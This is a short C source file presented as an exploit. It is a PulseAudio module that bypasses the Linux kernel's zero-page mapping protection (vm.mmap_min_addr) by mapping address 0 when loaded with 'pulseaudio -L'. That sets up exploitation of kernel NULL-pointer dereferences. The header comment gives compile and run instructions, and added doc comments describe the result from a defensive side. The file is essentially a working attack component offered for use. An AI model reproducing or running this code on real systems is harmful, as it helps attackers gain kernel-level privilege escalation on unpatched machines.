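/* bypass null ptr dereference "protection" in mainline kernel
   this is vulnerability #3 (or #4 depending on how you count) in a simple feature

   to compile, gcc -shared -o exploit.so pulseaudio_mmapnull.c
   to use, run pulseaudio -L /full/path/to/exploit.so
*/

/* MAP_ANONYMOUS is not ISO C; on glibc this makes strict -std= builds see it too. */
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE
#endif

#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/**
 * Module init hook: tries to place one anonymous read/write page at address 0.
 *
 * Reading the result from the defensive side: a return of 0 means this
 * process was allowed to map page zero, so the low-address mapping
 * restriction (vm.mmap_min_addr on Linux) was not in effect for it. In that
 * state a kernel NULL-pointer dereference reads memory the process controls
 * instead of faulting. A return of 1 is what a system enforcing the
 * restriction should produce for an unprivileged process.
 *
 * The page is never unmapped; on success it stays mapped for the life of the
 * process.
 *
 * @param m  handle passed in by the module loader; not used here.
 * @return 0 if the page at address 0 was mapped, 1 if the mapping was refused
 *         or landed anywhere else.
 */
int pa__init(void *m)
{
    (void)m;

    /* fd is -1: Linux ignores it for MAP_ANONYMOUS, other systems require it. */
    char *mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                     MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    if (mem != NULL) {
        /* Save errno first: fprintf may overwrite it. */
        int saved_errno = errno;

        fprintf(stderr, "UNABLE TO MAP ZERO PAGE!\n");
        if (mem == MAP_FAILED) {
            /* The reason separates a policy refusal from e.g. ENOMEM. */
            fprintf(stderr, "mmap: %s\n", strerror(saved_errno));
        }
        return 1;
    }

    fprintf(stdout, "MAPPED ZERO PAGE!\n");
    return 0;
}

/**
 * Module teardown hook; intentionally does nothing.
 *
 * @param m  handle passed in by the module loader; not used here.
 */
void pa__done(void *m)
{
    (void)m;
}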